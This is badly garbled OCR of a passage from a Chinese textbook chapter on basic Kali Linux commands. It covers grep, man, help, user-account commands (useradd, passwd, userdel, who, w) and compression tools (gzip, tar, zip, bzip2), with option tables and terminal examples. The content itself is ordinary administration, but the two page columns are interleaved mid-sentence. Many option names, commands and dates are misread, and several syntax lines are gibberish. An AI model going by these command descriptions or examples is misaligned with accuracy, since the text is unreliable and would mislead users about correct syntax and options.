-V 或 --revert-match 显示 不 包含 匹配 文本 的 所 有 行 
-V 或 --version 显示 版 本 信息 
-W 或 --word-regexp 只 显示 全 字符 合 的 列 
-XxX --line-regexp 只 显示 全 列 符 合 的 列 


此 参数 的 效果 和 指定 “-i” 参 数 相同 


例如 :使 用 grep 命 令 筛选 出 符合 条 件 ，4.6.7_ help 
的 文本 内 容 ， 执 行 grep asp /etc/services 命 help 为 内 置 指令 帮助 命令 ， 多 数 指令 并 
J 都 提供 了 内 置 的 帮助 手册 ， 如 果 忘 记 某 个 
ps | ee # Address Search protocod 指令 的 操作 方法 ， 可 以 使 用 help 查 看 帮助 信 

上 县。 | 口 
4.6.6 man 
help 命令 
man 命 令 是 Kali Linux 系 统 中 的 帮助 指 例如 ; 使 用 help umask 命 令 


令 ， 通 过 man 指 令 可 以 查看 Kali Linux 中 的 
已 . ， SS 今 
指令 帮助 、 配 置 文件 帮助 和 编程 帮助 等 信 on idea | 执行 效果 


S| umask: umask [-p] [-S] [模式 ] 
心 '。 日 令 语 法 格式 如 下 : 显示 或 设 定 文件 模式 掩 码 。 
设 定 用 户 文 件 创建 掩 码 为 MODE 模式 。 如 果 省 略 了 MODE ， 则 
man [命令 或 配置 文件 ] 打印 当前 掩 码 的 值 。 
今 参 绍 如 果 MODE 模式 以 数字 开头 ， 则 被 当 作 八 进 制 数 解析 ; 否则 是 一 个 
命令 中 选项 页 的 参 数 介 见 下 表 。 chmod(1) 可 接收 的 符号 模式 串 。 
表 ”grep 命 令 参 数 介 绍 选项 : 
-p 如 果 省 略 MODE 模式 ， 以 可 重用 为 输入 的 格式 输入 
洗 项 会 x -5S 以 符号 形式 输出 ， 否 则 以 八进制 数 格式 输出 
退出 状态 : 
-a 在 所 有 的 man 帮 助手 册 中 搜索 返回 成 功 ， 除 非 使 用 了 无 效 的 _MODE 模式 或 者 选项 。 


等 价 于 whatis 指 令 ， 显 示 给 定 关 键 字 的 简 

短 描述 信息 se 人 

-了 指定 内 容 时 使 用 分 页 程序 4.7 用户 账 户 操 作 命 令 

de 任何 操作 系统 都 需要 人 来 使 用 ， 如 
例如 : 使 用 man 命 令 ， 查 看 ls 的 帮助 信 ， 何 创建 并 管理 账户 ， 便 是 本 节 要 学 习 的 

息 ， 下 图 为 命令 执行 效果 。 内 容 。 


L5(1) 


L5(1) User Commands 
4.7.1 useradd 


NANE 


ls - list directory contents 


a Kali Linux 系 统 中 的 useradd 命 令 用 于 建 pt ; 


ls [DPTIDN]... [EILE]... 


ti information about the FILES (the current directory by default). 并 用 户 账 号 。 账号 建 好 之 后 》 册 用 passwd 
50rt entries alphabetically if none of -cftuVvSUX nor --sort 15 5Speci- 
fiet. 设 定 账 号 的 密码 ， 还 可 用 userdel 删 除 账 
Mandatory arguments to long options are mandatory for short options _ 
号 ， 使 用 useradd 指 令 所 建立 的 账号 ， 实 际 
-日 ，- -日 

do not ignore entries starting with . 上 是 保存 在 /etc/passwd 文 本 文件 中 。 命令 


-A, --almost-all 
do not list implied . and .. 语法 格式 如 
I 工 下 
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useradd [-mMnr] [-c < 备注 >] [-d < 登入 目录 >] [-e < 有 效 期 限 >] [-£f < 缓冲 天 数 >] [-g < 和 群 组 >] 
[-G < 和 群 组 >] [-s <shell>] [-u <uid>] [用 户 帐 号 ] 


或 


useradd -D [-b] [-e < 有 效 期 限 >] [-f < 缓冲 天 数 >] [-g < 群 组 >] [-G < 和 群 组 >] [-s <shell>] 


命令 中 选项 的 参数 介绍 见 下 表 。 


表 useradd 命 令 参 数 介绍 


选 项 含 义 

-C< 备 注 > 加 上 备注 文字 。 备 注 文字 会 保存 在 passwd 的 备注 栏 位 中 
-d< 登 录 目 录 > 指定 用 户 登 录 时 的 起 始 目 录 
-D 变更 预 设 值 
-e< 有 效 期 限 > 指定 账号 的 有 效 期 限 
-< 缓冲 天 数 > 指定 在 密码 过 期 后 多 少 天 即 关 闭 该 账号 
-g< 群 组 > 指定 用 户 所 属 的 群 组 
-G< 群 组 > 指定 用 户 所 属 的 附加 群 组 
-m 自动 建立 用 户 的 登录 目录 
-M 不 要 目 动 建立 用 户 的 登录 目录 
-0 取消 建立 以 用 户 名 称 为 名 的 群 组 
和 建立 系统 账号 
-s<shell> 指定 用 户 登 录 后 所 使 用 的 shell 
-U<uid> 指定 用 户 ID 

例如 : 使 用 useradd test 命 令 可 以 增加 一 或 


个 新 用 户 ， 执 行 命 令 如 下 : 


# useraddqd test 


新 用 户 需 要 使 用 passwd 命 令 设 置 账号 密 
码 。 


Kali Linux 系 统 中 的 adduser 命 令 用 于 创 


” 建 用 户 账号 或 更 新 现 有 账号 资料 ，adduser 


与 useradd 指 令 为 同一 指令 ， 该 命令 的 使 用 
权限 为 系统 管理 员 。 命 令 语法 格式 如 下 : 


[-d home dirl] 
I capire datelNl TL inactive Linmele lg 
nid grouplll Gogromlr oe el tl mot k 
SEELeLon qr Nl pp passwalnlt ss 
ne oad or -nl i= Liognid 


adduser [-c commentl] 
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Onser Deraul Eggroanl 1 -5 
dertanlt hone Tt detaulit nactivel [已 
deTault capire datelNl Ss getanlt se 


命令 中 选项 的 参数 介绍 见 下 表 。 


表 adduser 命 令 参 数 介绍 


选 项 含 义 

oo 新 使 用 者 位 于 密码 档 (通常 是 /etc/ 
passwd) 的 注解 资料 
设 定 使 用 者 的 家 目录 为 home dir， 预 

-dhome dir 设 值 为 预 设 的 home 后 面 加 上 使 用 者 账 
号 loginid 

设 定 此 账号 的 使 用 期 限 〈 格 式 为 
-e explre date 


YYYY-MM-DD) ， 预 设 值 为 永久 有 效 


例如 : 使 用 adduser test2 人 命令， 创建 一 
个 账号 ， 账 号 创建 过 程 中 会 提示 设置 密码 ， 
还 有 一 些 基本 信息 ， 下 图 为 执行 效果 。 
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Anrep ee 不 删除 相关 文件 。 命 令 语法 格式 如 下 : 
root@kali:~/temp# adduser test2 
正在 添加 用 户 "test2"... userdel [一 工 ] [用 户 账 号 ] 
正在 添加 新 组 "test2" (10601) . . . 
沁 Ne 中 组" "| ， 一 
多 种 主 目录 "/hone7testz 命令 中 选项 的 参数 -r， 表 示 删 除 用 户 合 
正在 从 "/etc/skel" 复 制 文件 ..,. 
答 入 新 的 UNIX 中 入 目录 以 及 目录 中 所 有 文件 。 
重新 输入 新 的 UNIX 密码 : 二 
asswd : 已 成 功 更 新 密码 根据 实际 需求 选择 相应 的 指令 ， 删除 账 
在 改变 test2 的 用 户 信 息 El a 
请 输入 新 值 ， 或 直接 禹 回 车 键 以 使 用 默认 值 户 必 须 存在 才 会 有 效果 ， 下 图 为 执行 效果 。 
i Lis root@kali:~# Which deluser 
工作 电话 []: /usr/sbin/deluser 
家 庭 电 话 []: root@kali:-# which userdel 
其 他 []: /usr/sbin/userdel 
这 些 信息 是 否 正 确 ? [Y/n] y root@kali:~# USeradd test 


root@kali:-~# Userdel test 
root@kali:-# Useradd test 
root@kali:-~# deluser test 


4.7.3 passwd 正在 删除 用 户 'test' .. 


些 告 : 组 "test" 没 有 其 他 成 员 了 。 
Kali Linux 系 统 中 的 passwd 命 令 用 来 修 Oe 

改 账 号 密码 ， 如 果 使 用 useradd 创 建 的 账户 4 75 who 

默认 是 没有 设置 密码 的 ， 可 以 通过 该 指令 

ee 

I 系统 中 有 哪些 使 用 者 正在 上 面 ， 显 示 的 资 
passwd [xl [ll [0 [FI] ta cs 料 包含 了 使 用 者 ID、 使 用 的 终端 机 、 从 哪 


[username ] 、 
个 信 由 选项 的 参数 介绍 见 下 才 边 连 上 来 的 、 上 线 时 间 、 末 消 时 间 、CPU 
人 使 用 量 、 动 作 等 。 所 有 使 用 者 都 可 使 用 。 
ee hid 命令 语法 格式 如 下 : 
选 项 合 义 who Thustvi iuserl 
< 命令 中 选项 的 参数 介绍 见 下 表 。 
nti 表 who 命 令 参数 介绍 
二 更 新 只 能 发 送 在 过 期 之 后 
| 停止 账号 使 用 
pp -HH 或 --heading 显示 各 栏 位 的 标题 信息 列 
| A 瑟 心 \ 
显示 闲置 时 间 ， 若 该 用 户 在 前 
u 局 用 已 被 停止 的 账户 一 分 钟 之 内 有 进行 任何 动作 ， 
x 设置 密码 的 有 效 期 -i 或 -u 或 --idle 将 标示 成 “.” 号 ， 如 果 该 用 户 
已 超过 24 小 时 没有 任何 动作 ， 
_ 多 性 群 组 密 : 
ls 则 标示 出 old 字 符 串 
-i 过 期 后 停止 用 户 账号 此 选项 的 效果 和 指定 am i 字符 
例如 :使 用 passwd 命 令 修改 账号 密 ee 
码 ， 下 图 为 命令 执行 效果 。 -4 或 -coum rp 
root@kali:~/temp# passwd test 此 选项 将 忽略 不 予 处 理 ， 仅 负 
输入 新 的 UNIX 密码 : 忽略 个 ， 仪 负 
重新 输入 新 的 UNIX 密码 : -S 责 解决 who 指 令 其 他 版 本 的 兼 
passwd : 已 成 功 更 新 密码 容 性 问题 


-W 或 -IT 或 --mesg 或 -- 
message 或 --writable 


4.7.4 userdel 显示 用 户 的 信息 状态 栏 a 


WE 管 ” 
mv 
ro 


userdel 可 删除 用 户 账号 与 相关 的 文 | a 
: ho 命令 
件 。 若 不 加 参数 ， 则 仅 删 除 用 户 账号 ， 而 例如 : 使 用 who 命 令 查看 当前 账户 信 
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加 注油 昌 已 ， 下 图 为 执行 效果 。 4.8.1 gzip 
A Re 人 2018-10-30 22:44 (:1 Kall Linux 系 统 中 的 gzip 命 令 用 于 压缩 
eh or hsp pl 文件 ， gzip 是 个 使 用 广泛 的 压缩 程序 ， 文 件 


root - 2018-10-30 22:44 (:1 


经 它 压 缩 过 后 ， 其 名 称 后 面 会 多 出 “.gz” 
的 扩展 名 。 命 令 语 法 格式 如 下 : 


We 人 显示 gzip [-acdfhlLnNqrtvV][-S &lt; 压 缩 
四 9 ee ee 
前 登录 系统 的 用 户 信 息 。 执行 这 项 指令 可 fast] [文件 ...] 或 gzip [-acdfhlLnNqrtvV] 

得 知 目前 登录 系统 的 用 户 有 哪些 人 ， 以 及 他 


[-S &1lt; 压 缩 字 尾 字 符 串 ggt;] [-&1t; 压 缩 效 率 
&gt;] [--best/fast] [目录 ] 


们 正在 执行 的 程序 。 单 独 执行 w 指 令 会 显示 
所 有 的 用 户 ， 也 可 指定 用 户 名 称 ， 仅 显示 茶 
位 用 户 的 相关 信息 。 命 令 语 法 格式 如 下 : 

w [-fhlsuV] [用 户 名 称 ] 

命令 中 选项 的 参数 介绍 见 下 表 。 


表 Ww 命令 参数 介绍 


选 项 含 义 

至 开局 或 关闭 显示 用 户 从 何 处 登录 系统 

-h 不 显示 各 栏 位 的 标题 信息 列 

| 使 用 详细 格式 列表 ， 此 为 预 设 值 
使 用 简洁 格式 列表 ， 不 显示 用 户 登 录 时 

间 ， 终 端 机 阶段 作业 和 程序 所 耗费 的 
CPU 时 间 

忽略 执行 程序 的 名 称 ， 以 及 该 程序 耗费 
CPU 时 间 的 信息 

显示 版 本 信息 


例如 : 使 用 w 命 令 碍 看 登录 用 户 的 详细 
信息 ， A J 效果 。 


est26kali: mp Ww 

82:90:19 i ee 人 1 user, load average: 0.060，6.99，06.00 

SER TTY FROM LOGIN@ IDLE JCPU PCPU W 

root 2 <1 22:44 ?xdm? 7:46 0.12s te ea 


食 提 示 : Kali Linux 为 用 户 提供 了 两 个 用 于 


查询 用 户 信 
令 ， 其 中 ， 


息 的 指令 ， 分 别 为 who 命 令 与 w 命 
WwW 命 令 相 对 来 说 信息 更 全 面 一 些 。 


4.8 文件 解压 缘 操作 命令 


在 日 第 工作 中 Kali Linux 系 统 会 产生 大 
量 的 日 志文 件 ， 如 果 不 去 处 理 可 能 会 导致 
硬盘 空间 告急 ， 因 此 合理 地 使 用 解压 纵 命 
令 将 一 类 文件 压缩 存放 ， 既 可 以 减少 空间 
浪费 还 便于 移动 。 
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命令 中 选项 的 参数 介绍 见 下 表 。 
表 gzip 命令 参数 介绍 


选 项 
-a 或 --ascil 


-C 或 --stdout 或 --to- 
stdout 


-d 或 --decompress 
或 ----uncompress 


-f 或 --force 


-h 或 --help 
-| 或 --list 
-L 或--license 


-0 或 --no-name 


-N 或 --name 
-q 或 --quiet 
-I 或 --recursive 


-S< 压 缩 字 尾 字符 
串 > 或 ----sSufGix< 压 
缩 字 尾 字符 串 > 
-t 或 --test 

-V 或 --verbose 


-V 或 --version 


-< 压缩 效率 > 
--best 
--fast 


含 义 
使 用 ASCII 文 字模 式 


把 压缩 后 的 文件 输出 到 标准 输出 
设备 ， 不 去 更 动 原始 文件 


解 开 压缩 文件 


强行 压缩 文件 。 不 理会 文件 名 称 
或 硬 连接 是 否 存在 以 及 该 文件 是 
否 为 符号 连接 

在 线 帮 助 

列 出 压缩 文件 的 相关 信息 
显示 版 本 与 版 权 信 息 

压缩 文件 时 ， 不 保存 原来 的 文件 
名 称 及 时 间 戳 记 

压缩 文件 时 ， 保 存 原来 的 文件 名 
称 及 时 间 戳 记 

不 显示 警告 信息 

递归 处 理 ， 将 指定 目录 下 的 所 有 
文件 及 子 目 录 一 并 处 理 


更 改 压 缩 字 尾 字符 串 


测试 压缩 文件 是 否 正确 无 误 
显示 指令 执行 过 程 
显示 版 本 信息 

压缩 效率 是 一 个 介 于 1 一 9 的 数 
值 ， 预 设 值 为 “6”， 指 定 越 大 
的 数值 ， 压 缩 效 率 就 会 越 高 

此 参数 的 效果 和 指定 “-9” 参 数 
相同 

此 参数 的 效果 和 指定 “-1” 参 数 
相同 
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gzip 命 令 只 能 压缩 文件 ， 例 如 : 使 用 
gZip services 命 令 压 缩 001.txt 文 件 ， 下 图 为 
运行 效果 ， 压 缩 后 源 文件 消失 ， 使 用 gzip -d 
可 以 解压 .gz 文件 ， 同 时 gz 压缩 比例 还 是 很 
大 的 。 
root@kali: /temp# TS -1 


总 用 量 20 
-rw-r--r-- 1 root root 19183 16 月 31 03:44 services 


root@kali:~/temp# gzip services 
root@kali:~/temp# ls -\ 

总 用 量 8 

-rw-r--r-- 1 root root 7441 16 月 31 03:44 services .gz 


4.8.2 gunzip 


Kali Linux 系 统 中 的 gunzip 命 令 用 于 解 
压 文 件 。gunzip 是 个 使 用 广泛 的 解压 缩 程 
序 ， 它 用 于 解 开 被 gzip 压 缩 过 的 文件 ， 这 些 
压缩 文件 预 设 最 后 的 扩展 名 为 “.gz”。 事 
实 上 gunzip 就 是 gzip 的 硬 连 接 ， 因此 不 论 是 
压缩 或 解压 缩 ， 都 可 通过 gzip 指 令 单 独 完 
成 。 命 令 语法 格式 如 下 : 

unzlip T= acfhLLnNmgrtvv)l 3 < 
压缩 字 尾 字符 串 >] [文件 ...] 或 gunzip 
[-acfhlLnNqrtvV] [-s < 压缩 字 尾 字符 串 >] [目录 ] 

命令 中 选项 的 参数 介绍 见 下 表 。 


表 gunzip 命 令 参 数 介绍 


选项 售 义 
-a 或 --ascii 使 用 ASCII 文 字模 式 
-Cc 或 --stdout 或 --to- | 把 解压 后 的 文件 输出 到 标准 输 
stdout 出 设备 
强行 解 开 压缩 文件 ， 不 理会 文 
-f 或 -force 件 名 称 或 硬 连接 是 否 存在 以 及 
该 文件 是 否 为 符号 连接 
-h 或 -help 在 线 帮 助 
-] 或 --list 列 出 压缩 文件 的 相关 信息 
-或 --license 显示 版 本 与 版 权 信息 
解压 缩 时 ， 若 压缩 文件 内 含有 
-0 或 --n0-name 远 来 的 文件 名 称 及 时 间 玲 记 ， 
则 将 其 忽略 不 予 处 理 
解压 缩 时 ， 若 压缩 文件 内 含有 
-N 或 --name 原来 的 文件 名 称 及 时 间 戳 记 ， 
则 将 其 回 存 到 解 开 的 文件 上 
-q 或 --quiet 不 显示 警告 信息 
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续 表 
含义 
递归 处 理 ， 将 指定 目录 下 的 所 
有 文件 及 子 目录 一 并 处 理 


选 项 


-I 或 --recursive 


-S< 压 缩 字 尾 字符 串 

> 或 --suffix< 压 缩 字 | 更 改 压缩 字 尾 字符 串 

尾 字符 串 > 

-t 或 --test 测试 压缩 文件 是 否 正 确 无 误 
-V 或 --verbose 显示 指令 执行 过 程 

-V 或 --version 显示 版 本 信息 


gunzip 命 令 与 gzip 配 合 使 用 ， 通 过 gzip Se / 
压缩 后 的 文件 可 以 通过 gunzip 解 压缩 ， 例 证 并 
如 : 使 用 gunzip 001.txt.gz 命 令 ， 下 图 为 运 
行 效 末 ， 解 压 后 源 压缩 包 消 失 。 


root@kali:~/temp# ls -\ 
总 用 量 8 
-rw-r--r-- 1 root root 7441 16 月 31 03:44 services.gz 


root@kali:~/temp# gunzip services.gz 
root@kali:~/temp# ls -1 

总 用 量 290 

-rw-r--r-- 1 root root 19183 16 月 31 903:44 services 


4.8.3 tar en 
Kali Linux 系 统 中 的 tar 命 令 用 于 备份 文 占 6 of 

件 ，tar 是 用 来 建立 、 还 原 备 份 文件 的 工具 程 

序 ， 它 可 以 加 入 ， 解 开 备 份 文 件 内 的 文件 ， 

使 用 tar 命 令 压缩 后 ， 文 件 的 格式 为 targz。 
命令 语法 格式 如 下 : 

选项 [-zcf] [压缩 后 文件 名 ] [目录 ] 

命令 中 选项 的 参数 介绍 见 下 表 。 

表 tar 命令 参数 介绍 


tar 


选 项 含 义 
二 打包 
-V 显示 详细 信息 
f 指定 文件 名 
打包 同时 压缩 


tar 命 令 可 以 将 目录 打包 成 一 个 文件 ， 
例如 : 使 用 tar -cvf temp.tar temp 命 令 ， 将 
目录 temp 打 包 成 temp.tar 文 件 ， 如 果 需 要 在 
打包 的 同时 进行 压缩 可 以 加 入 -z 选 项 ， 下 
为 tar -zcf temp.tar temp 命 令 执 行 效果 ， 它 
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相当 于 tar -cvf temp.tar temp 和 gzip temp.tar 
两 条 命令 ， 男 外 .tar.gz 是 最 常见 的 源 代 码 安 
装 包 。 


例如 : 使 用 tar -zxvf temp.tar.gz 命 令 ， 
将 打 好 的 .tar.gz 包 进行 解压 ， 如 下 图 所 示 ， 
tar 解 压 是 不 删除 源 压缩 文件 的 。 


oot@kali:-~ [5 
esktop Downloads Pictures temp 
可 | u 


root@kali:~# ls 

besktop Downloads Pictures temp Test 
Documents Music Public Templates Videos 
root@kali:-# tar -zcf temp.tar.gz temp 


temp.tar.gz Video 
es Test 
ooterati ~ 大 tar -ZXVTf temp . tar.gz 


em 
root@kali:~# 1s ee txt 
Desktop Downloads Pictures temp 


Documents Music Public 


temp.tar.gz Videos 
Templates Test 


tar 命 令 解压 缩 的 命令 语法 格式 如 下 : 
选项 [-zxvf] [压缩 后 的 文件 名 ] [目录 ] 


命令 中 选项 的 参数 介绍 见 下 表 。 
表 tar 命 令 参数 介绍 


4.8.4 zip 


Kali Linux 系 统 中 的 zip 命 令 用 于 压缩 
文件 ， 文 件 经 它 压 缩 后 会 另外 产生 具有 
“.zip” 扩 展 名 的 压缩 文件 ， 同 时 它 也 是 多 
系统 之 间 兼 容 性 较 好 的 压缩 。 命 令 语法 格式 


tar 


选 项 含 义 如 下 : 
-Xx 解 包 
zip [-AcdDfFghjJKlLmoqrSTuvVwXyz$] 
和 显示 详细 信息 [-b < 工作 目录 >] [-11] [-n < 字 尾 字符 囊 >] [-t < 
f 指定 解压 文件 日 期 时 间 >] [< 压缩 效率 >] [压缩 文件 ] [文件 . . .] [-i 
< 范本 样式 >] [-x < 范本 样式 >] 
a 解压 缩 
命令 中 选项 的 参数 介绍 见 下 表 。 
表 zip 命令 参数 介绍 
选 项 含 义 
-A 调整 可 执行 的 上 自动 解压 缩 文 件 
-b< 工 作 目 录 > 指定 暂时 存放 文件 的 目录 
。 蔡 每 个 被 压缩 的 文件 加 上 注释 
-d 从 压缩 文件 内 删除 指定 的 文件 
-D 压缩 文件 内 不 建立 目录 名 称 
攻 此 参数 的 效果 和 指定 “-u” 参 数 类 似 ， 但 不 仅 更 新 已 有 文件 ， 如 果 某 些 文 件 原本 不 存在 
于 压缩 文件 内 ， 使 用 本 参数 会 一 并 将 其 加 入 压缩 文件 中 

下 尝试 修复 已 损坏 的 压缩 文件 
-g 将 文件 压缩 后 附加 在 已 有 的 压缩 文件 之 后 ， 而 非 另 行 建立 新 的 压缩 文件 
-h 在 线 帮助 
-i< 范 本 样式 > 只 压缩 符合 条 件 的 文件 
-] 只 保存 文件 名 称 及 其 内 容 ， 而 不 存放 任何 目录 名 称 
可 删除 压缩 文件 前 面 不 必要 的 数据 
上 使 用 MS-DOS 兼 容 格式 的 文件 名 称 
-| 压缩 文件 时 ， 把 LF 字符 置换 成 LF+CR 字 符 
-ll 压缩 文件 时 ， 把 LF+CR 字 符 置换 成 LF 字符 
jp 显示 版 权 信息 
-m 将 文件 压缩 并 加 入 压缩 文件 后 ， 删 除 原始 文件 ， 即 把 文件 移 到 压缩 文件 中 
-n< 字 尾 字符 串 > 不 压缩 具有 特定 字 尾 字符 串 的 文件 


00 


第 4 章 ”熟悉 无 线 网 络 安 全 测试 平台 一 一 Kali Linux 系 统 的 基本 操作 ES 下 


续 表 
选 ”项 含义 
四 以 压缩 文件 内 拥有 最 新 更 改 时 间 的 文件 为 准 ， 将 压缩 文件 的 更 改 时 间 设 成 和 该 文件 
相同 
-q 不 显示 指令 执行 过 程 
+ 递归 处 理 ， 将 指定 目录 下 的 所 有 文件 和 子 目录 一 并 处 理 
-S 包含 系统 和 隐藏 文件 
-< 日 期 时 间 > 把 压缩 文件 的 日 期 设 成 指定 的 日 其 
I 检查 备份 文件 内 的 每 个 文件 是 否 正确 无 误 
1 更 换 较 新 的 文件 到 压缩 文件 内 
y 显示 指令 执行 过 程 或 显示 版 本 信息 
Vv 保存 VMS 操 作 系 统 的 文件 属性 
-Ww 在 文件 名 称 里 加 入 版 本 编号 ， 本 参数 仅 在 VMS 操 作 系统 下 有 效 
-x< 范 本 样式 > 压缩 时 排除 符合 条 件 的 文件 
Xx 不 保存 额外 的 文件 属性 
y 直接 保存 符号 连接 ， 而 非 该 连接 所 指向 的 文件 ， 本 参数 仅 在 UNIX 之 类 的 系统 下 有 效 
局 保存 第 一 个 被 压缩 文件 所 在 磁盘 的 卷 册 名 称 
zz 葵 压缩 文件 加 上 注释 
-< 压缩 效率 > 压缩 效率 是 一 个 介 于 1~9 的 数值 


例如 :使 用 zip -r temp.zip temp 命 令 压 ”4.8.3 ”unzip A 
缩 目 录 ， 下 图 为 执行 效果 ， 也 可 以 不 加 -r 压 Kali Linux 系 统 中 的 unzip 命 令 用 于 解压 A 二 


- - » mm 
缩 文 件 。 缩 zip 文 件 ，unzip 为 .zip 压 缩 文 件 的 解压 缩 
root@kali:~# [LS 人 ;五 、 
Desktop Downloads Pictures temp Test 程序 。 命令 格式 语法 如 下 : 
Documents Music Public Templates Videos 
root@kali:-~# zip -rr temp.zip temp - 2 一 - 了 
RS SR I-cflptuvz| [aogcJIILMnogsVx 1 [一己 
adding: temp/services (deflated 61%) < 密码 >] [ .zip 文 件 ] [文件 ] [-d < 目录 >] [-x < 文件 
root@kali:-~# LS 
Desktop Downloads Pictures temp temp.zip Videosl >] 或 UnNZ1Pp [= 
Documents Music Public Templates Test 


命令 中 选项 的 参数 介绍 见 下 表 。 


表 unzip 命令 参数 介绍 


选项 含 义 
-C 将 解压 缩 的 结果 显示 到 屏幕 上 ， 并 对 字符 做 适当 的 转换 
主 更 新 现 有 的 文件 
-| 显示 压缩 文件 内 所 包含 的 文件 
p 与 -参数 类 似 ， 会 将 解压 缩 的 结果 显示 到 屏幕 上 ， 但 不 会 执行 任何 的 转换 
-t 检查 压缩 文件 是 否 正确 
但 是 除了 更 新 现 有 的 文件 外 ， 也 会 将 压缩 文件 中 的 其 他 文件 解压 缩 到 目 
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续 表 
选 项 含 义 
-V 执行 实时 显示 详细 的 信息 
仅 显 示 压 缩 文件 的 备注 文字 
-a 对 文本 文件 进行 必要 的 字符 转换 
-b 不 要 对 文本 文件 进行 字符 转换 
时 压缩 文件 中 的 文件 名 称 区 分 大 小 写 
5 不 处 理 压缩 文件 中 原 有 的 目录 路 径 
工 将 压缩 文件 中 的 全 部 文件 名 改 为 小 写 
-M 将 输出 结果 送 到 more 程 序 处 理 
1 解压 缩 时 不 要 覆盖 原 有 的 文件 
-0 不 必 先 询问 用 户 ，unzip 执 行 后 覆盖 原 有 文件 
-P< 密 码 > 使 用 zip 的 密码 选项 
-qd 执行 时 不 显示 任何 信息 
-S 将 文件 名 中 的 空白 字符 转换 为 底线 字符 
-V 保留 VMS 的 文件 版 本 信息 
-x 解压 缩 时 同时 回 存 文件 原来 的 UID/GID 
[.zip 文 件 ] 指定 .zip 压 缩 文件 
[文件 ] 指定 要 处 理 .zip 压 缩 文 件 中 的 哪些 文件 
-d< 目 录 > 指定 文件 解压 缩 后 所 要 存储 的 目录 
-x< 文 件 > 指定 不 要 处 理 .zip 压 缩 文 件 中 的 哪些 文件 
-Z unzip -Z 等 于 执行 zipinfo 指 令 


unzip 命 令 同 样 是 解压 zip 格 式 的 文件 ， 


学 例如 : 使 用 unzip temp.zip 命 令 ， 解 压 zip 文 
“” “ 件 ， 下 图 为 运行 效果 ， 由 于 源 文件 还 存在 


所 以 它 会 提示 是 否 要 人 蔡 换 源 文 件 ， 回 答 y 蔡 
换 ， n 不 蔡 换 。 


root@kali:~# ls 

Desktop Downloads Pictures temp 

Documents Music Public 

root@kali:~# Unzip temp.zip 

Archive: temp.zip 

replace temp/services? [yl]es, [nl]o, [A]ll, [Njone, [rjename: y 
inflating: temp/services 


temp .zip Videos 
Templates Test 
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4.8.6 bzip2 


Kali Linux 系 统 中 的 bzip2 命 令 是 .bz2 
文件 的 压缩 程序 ，bzip2 采 用 新 的 压缩 演算 
法 ， 压 缩 效果 比 传统 的 LZ77/LZ78 压 缩 算法 
更 好 。 大 没有 加 上 任何 参数 ，bzip2 压 缩 完 
文件 后 会 产生 .bz2 的 压缩 文件 ， 并 删除 原始 
的 文件 。 命 令 语法 格式 如 下 : 

Di coatnvboeEv zl en LieLVes 


best] [--repetitive-fast][- 压缩 等 级 ] [要 压 
缩 的 文件 ] 
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表 bzip2 命 令 参数 介绍 


选 项 含 义 
-Cc 或--stdout 将 压缩 与 解压 缩 的 结果 送 到 标准 输出 
-d 或 --decompress 执行 解压 缩 


bzip2 在 压缩 或 解压 缩 时 ， 知 输出 文件 与 现 有 文件 同名 ， 预 设 不 会 覆盖 现 有 文件 。 寿 要 


覆盖 ， 请 使 用 此 选项 

-h 或 --help 显示 帮助 

-或 --keep bzip2 在 压缩 或 解压 缩 后 ， 会 删除 原始 的 文件 。 若 要 保留 原始 文件 ， 请 使 用 此 选项 

-Ss 或--small 降低 程序 执行 时 内 存 的 使 用 量 

-t 或 --test 测试 .bz2 压 缩 文件 的 完整 性 

-V 或 --verbose 压缩 或 解压 缩 文件 时 ， 显 示 详 细 的 信息 

-Zz 或 --compress 强制 执行 压缩 

--repetitive-best 若 文 件 中 有 重复 出 现 的 资料 时 ， 可 利用 此 选项 提高 压缩 效果 

--repetitive-fast 若 文 件 中 有 重复 出 现 的 资料 时 ， 可 利用 此 选项 加 快 执行 速度 

-压缩 等 级 压缩 时 的 区 块 大 小 

bzip2 是 gzip 的 一 个 升级 版 ， 也 只 能 表 ”bunzip2 命 令 参数 介绍 
于 压缩 文件 ， 并 且 压 缩 比 例 惊 人 。 如 果 压 选 项 念 义 
i 人 8 
缩 一 个 比较 大 的 文件 推荐 使 用 ， 例 如 a 
运行 bzip2 -k services 命 令 ， 压 缩 services 与 现 有 文件 同名 时 ， 预 设 
文件 ， 下 图 为 命令 执行 效果 ， 如 果 有 压缩 不 会 覆盖 现 有 的 文件 。 若 
目录 的 需求 ， 可 以 先 使 用 tar 命 令 将 目录 人 
打包 成 文件 ， 再 用 bzip2 进 行 压 缩 ， 也 可 在 解压 缩 后 ， 预 设 会 删除 
以 使 用 tar --cjf 一 次 性 打包 再 压缩 成 ,tarbz2 -或 - 原来 的 压缩 文件 。 者 要 保 
使 jf 一 次 性 打包 入 压 乡 KR 留 压缩 文件 ， 请 使 用 此 参 

格式 。 出 
root@kali:~/temp# ls -l 
总 用 量 29 降低 程序 执行 时 ， 内 存 的 
-rw-r--r-- 1 root root 19183 10 月 31 03:44 services -Ss 或 --small 
root@kali:~/temp# bzip2 -k services 使 用 量 
root@kali:~/temp# ls -\ 
总 ~ (= 元 ] 
er 1 root root 19183 16 月 31 93:44 services -V 或 --verbose 解压 缩 文 件 时 ， 显 示 详 细 
-rw-r--r-- 1 root root 71608 16 月 31 93:44 services.bz2 的 信息 


-] --license.-V 或 --version | 显示 版 本 信息 


4.8.7 bunzip2 
Kali Linux 系 统 中 的 bunzip2 命 令 是 .bz2 例如 : 使 用 bunzip2 services.bz2 命 令 解 : 


ar 0 
yj i 机 
= 有 
mA 
-4 


文件 的 解压 缩 程序 。bunzip2 可 解压 缩 .bz2 压 文件 ， 下 图 为 命令 执行 交办 ， 如 果 想 型 


格式 的 压缩 文件 。bunzip2 实 际 上 是 bzip2 的 解压 .tarbz2 的 文件 同样 可 以 使 用 tar -jzf 来 
符号 连接 ， 执 行 bunzip2 与 bzip2 -d 的 效果 相 完成 。 


一 SR \ 五 、 root@kali:~/temp# ls -\ 
同 。 命 令 语法 格式 如 下 : 总 用 量 8 
-rw-r--r-- 1 root root 7108 16 月 31 03:44 services.bz2 
I FEIil D2 3 root@kali:~/temp# bunzip2 Services .bz2 
1[ 压缩 文件 ] root@kali:~/temp# ls -1 
、 总 用 量 29 
命令 中 选项 的 参数 介绍 见 下 表 。 -rw-r--r-- 1 root root 19183 16 月 31 03:44 services 
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在 对 文件 进行 压缩 解压 的 过 程 中 ， 应 续 表 
该 注意 以 下 几 点 : 选 项 合 义 
(1) .gz 格式 使 用 gzip 进行 压缩 ， 使 %CPU 占用 的 CPU 使 用 率 
用 gunzip 或 者 gzip -d 进行 解压 ， 只 可 压 ” %MEM 占用 的 记忆 体 使 用 率 
